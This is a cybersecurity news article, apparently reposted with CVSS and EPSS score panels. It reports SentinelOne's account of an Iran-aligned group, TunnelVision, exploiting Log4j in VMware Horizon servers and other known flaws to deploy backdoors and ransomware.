Lucene search

K
thnThe Hacker NewsTHN:F25FAD25E15EBBE4934883ABF480294D
HistoryFeb 18, 2022 - 7:40 a.m.

Iranian Hackers Targeting VMware Horizon Log4j Flaws to Deploy Ransomware

2022-02-1807:40:00
The Hacker News
thehackernews.com
301

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.974 High

EPSS

Percentile

99.9%

VMware Horizon Log4j

A “potentially destructive actor” aligned with the government of Iran is actively exploiting the well-known Log4j vulnerability to infect unpatched VMware Horizon servers with ransomware.

Cybersecurity firm SentinelOne dubbed the group “TunnelVision” owing to their heavy reliance on tunneling tools, with overlaps in tactics observed to that of a broader group tracked under the moniker Phosphorus as well as Charming Kitten and Nemesis Kitten.

“TunnelVision activities are characterized by wide-exploitation of 1-day vulnerabilities in target regions,” SentinelOne researchers Amitai Ben Shushan Ehrlich and Yair Rigevsky said in a report, with the intrusions detected in the Middle East and the U.S.

Also observed alongside Log4Shell is the exploitation of Fortinet FortiOS path traversal flaw (CVE-2018-13379) and the Microsoft Exchange ProxyShell vulnerability to gain initial access into the target networks for post-exploitation.

“TunnelVision attackers have been actively exploiting the vulnerability to run malicious PowerShell commands, deploy backdoors, create backdoor users, harvest credentials and perform lateral movement,” the researchers said.

The PowerShell commands are used as a launchpad to download tools like Ngrok and run further commands by means of reverse shells that are employed to drop a PowerShell backdoor that’s capable of gathering credentials and executing reconnaissance commands.

SentinelOne also said it identified similarities in the mechanism used to execute the reverse web shell with another PowerShell-based implant called PowerLess that was disclosed by Cybereason researchers earlier this month.

All through the activity, the threat actor is said to have utilized a GitHub repository known as “VmWareHorizon” under the username “protections20” to host the malicious payloads.

The cybersecurity company said it’s associating the attacks to a separate Iranian cluster not because they are unrelated, but owing to the fact that “there is at present insufficient data to treat them as identical to any of the aforementioned attributions.”

Found this article interesting? Follow THN on Facebook, Twitter and LinkedIn to read more exclusive content we post.

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.974 High

EPSS

Percentile

99.9%